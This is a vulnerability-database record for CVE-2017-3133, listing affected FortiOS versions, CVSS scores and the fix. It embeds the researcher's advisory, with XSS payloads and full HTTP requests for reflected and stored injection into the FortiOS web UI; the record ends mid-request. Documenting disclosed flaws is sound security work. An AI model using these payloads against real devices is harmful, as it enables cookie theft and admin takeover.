var-201709-0477

Vulnerability from variot

A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. FortiOS is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. # Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities

Vendor: Fortinet (www.fortinet.com)

CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133

Date: 28.07.2016

Author: Patryk Bogdan (@patryk_bogdan)

Affected FortiNet products: * CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0 * CVE-2017-3132 : FortiOS versions upto 5.6.0 * CVE-2017-3133 : FortiOS versions upto 5.6.0

Fix: Upgrade to FortiOS version 5.6.1

Video PoC (add admin): https://youtu.be/fcpLStCD61Q

Vendor advisory: https://fortiguard.com/psirt/FG-IR-17-104

Vulns:

XSS in WEB UI - Applications:

URL: https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y

Http request: GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

Http response: HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 12:07:47 GMT Server: xxxxxxxx-xxxxx Cache-Control: no-cache Pragma: no-cache Expires: -1 Vary: Accept-Encoding Content-Length: 6150 Connection: close Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-UA-Compatible: IE=Edge (...) 15832" onmouseover=alert('XSS') x="y (...)

XSS in WEB UI - Assign Token:

URL: https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E

Http request: GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

Http response: HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 13:39:17 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 13:39:17 GMT Vary: Cookie,Accept-Encoding Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT X-UA-Compatible: IE=Edge Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3485 (...)

(...)

Stored XSS in WEB UI - Replacement Messages:

1 - Http request:

POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: / Accept-Language: pl,en-US;q=0.7,en;q=0.3 Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff X-Requested-With: XMLHttpRequest Content-Length: 125 Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D DNT: 1 Connection: close

csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A

1 - Http response:

HTTP/1.1 302 FOUND Date: Thu, 23 Mar 2017 15:36:33 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 15:36:33 GMT Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN X-UA-Compatible: IE=Edge Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/ Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 0

2 - Http request:

GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: / Accept-Language: pl,en-US;q=0.7,en;q=0.3 Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff X-Requested-With: XMLHttpRequest Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D DNT: 1 Connection: close

2 - Http response:

HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 15:36:33 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 15:36:33 GMT Vary: Cookie,Accept-Encoding Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT X-UA-Compatible: IE=Edge Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70940 (...)

(...)

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0477",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "fortios",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "fortinet",
        "version": "5.6.0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "fortinet",
        "version": "5.6.0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.6"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.5"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.4"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.3"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.2"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.1"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.4.0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0"
      },
      {
        "model": "fortios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.6.1"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.6.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Patryk Bogdan of Secorda.",
    "sources": [
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2017-3133",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-3133",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-111336",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2017-3133",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-3133",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201707-1512",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-111336",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. FortiOS is prone to multiple cross-site scripting vulnerabilities. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected  site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. # Title: FortiOS \u003c= 5.6.0 Multiple XSS Vulnerabilities\n# Vendor: Fortinet (www.fortinet.com)\n# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133\n# Date: 28.07.2016\n# Author: Patryk Bogdan (@patryk_bogdan)\n\nAffected FortiNet products:\n* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0\n* CVE-2017-3132 : FortiOS versions upto 5.6.0\n* CVE-2017-3133 : FortiOS versions upto 5.6.0\n\nFix:\nUpgrade to FortiOS version 5.6.1\n\nVideo PoC (add admin):\nhttps://youtu.be/fcpLStCD61Q\n\nVendor advisory:\nhttps://fortiguard.com/psirt/FG-IR-17-104\n\n\nVulns:\n\n1. XSS in WEB UI - Applications:\n\nURL:\nhttps://192.168.1.99/ng/fortiview/app/15832\" onmouseover=alert(\u0027XSS\u0027) x=\"y\n\nHttp request:\nGET /ng/fortiview/app/15832%22%20onmouseover=alert(\u0027XSS\u0027)%20x=%22y HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nCookie: APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A\"; ccsrftoken_573485771=\"5424C6B3842788A23E3413307F1DFFC5\"; ccsrftoken=\"5424C6B3842788A23E3413307F1DFFC5\"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHttp response:\nHTTP/1.1 200 OK\nDate: Thu, 23 Mar 2017 12:07:47 GMT\nServer: xxxxxxxx-xxxxx\nCache-Control: no-cache\nPragma: no-cache\nExpires: -1\nVary: Accept-Encoding\nContent-Length: 6150\nConnection: close\nContent-Type: text/html; charset=utf-8\nX-Frame-Options: SAMEORIGIN\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nX-UA-Compatible: IE=Edge\n(...)\n\u003cspan class=\"fgd-app tooltip id_15832\" onmouseover=\"alert(\u0027XSS\u0027)\" x=\"y \" data-address=\"undefined\" data-dport=\"443\" data-protocol=\"6\"\u003e\u003ca href=\"https://www.fortiguard.com/fos/15832\" onclick=\"return false;\" data-hasqtip=\"2\"\u003e\u003cspan class=\"app_icon app15832\" onmouseover=\"alert(\u0027XSS\u0027)\" x=\"y\"\u003e\u003c/span\u003e\u003clabel class=\"app_label\" title=\"\"\u003e15832\" onmouseover=alert(\u0027XSS\u0027) x=\"y\u003c/label\u003e\u003c/a\u003e\u003c/span\u003e\n(...)\n\n\n2. XSS in WEB UI - Assign Token:\n\nURL:\nhttps://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(\u0027XSS\u0027)%3C/script%3E%3Cscript%3E\n\nHttp request:\nGET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nCookie: APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A\"; ccsrftoken_573485771=\"314A25687F6B2075F9413405575D477\"; ccsrftoken=\"314A25687F6B2075F9413405575D477\"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHttp response:\nHTTP/1.1 200 OK\nDate: Thu, 23 Mar 2017 13:39:17 GMT\nServer: xxxxxxxx-xxxxx\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nExpires: Thu, 23 Mar 2017 13:39:17 GMT\nVary: Cookie,Accept-Encoding\nLast-Modified: Thu, 23 Mar 2017 13:39:17 GMT\nX-UA-Compatible: IE=Edge\nCache-Control: max-age=0\nX-FRAME-OPTIONS: SAMEORIGIN\nSet-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/\nConnection: close\nContent-Type: text/html; charset=utf-8\nContent-Length: 3485\n(...)\n\u003cscript type=\"text/javascript\"\u003e\n    var ftokens = [];\n    var action = \u0027\u003c/script\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\u003cscript\u003e\u0027;\n\u003c/script\u003e\n\u003c/head\u003e\n(...)\n\n\n3. Stored XSS in WEB UI - Replacement Messages:\n\n#1 - Http request:\nPOST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: */*\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nReferer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff\nX-Requested-With: XMLHttpRequest\nContent-Length: 125\nCookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A\"; ccsrftoken_573485771=\"592068D7C2B5BDB7A91833DB6A512C14\"; ccsrftoken=\"592068D7C2B5BDB7A91833DB6A512C14\"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D\nDNT: 1\nConnection: close\n\ncsrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff\u0026buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(\u0027XSS\u0027)%3C%2Fscript%3E%0A\n\n#1 - Http response:\nHTTP/1.1 302 FOUND\nDate: Thu, 23 Mar 2017 15:36:33 GMT\nServer: xxxxxxxx-xxxxx\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nExpires: Thu, 23 Mar 2017 15:36:33 GMT\nLast-Modified: Thu, 23 Mar 2017 15:36:33 GMT\nCache-Control: max-age=0\nX-FRAME-OPTIONS: SAMEORIGIN\nX-UA-Compatible: IE=Edge\nSet-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/\nLocation: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/\nConnection: close\nContent-Type: text/html; charset=utf-8\nContent-Length: 0\n\n#2 - Http request:\nGET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1\nHost: 192.168.1.99\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: */*\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\nReferer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff\nX-Requested-With: XMLHttpRequest\nCookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; 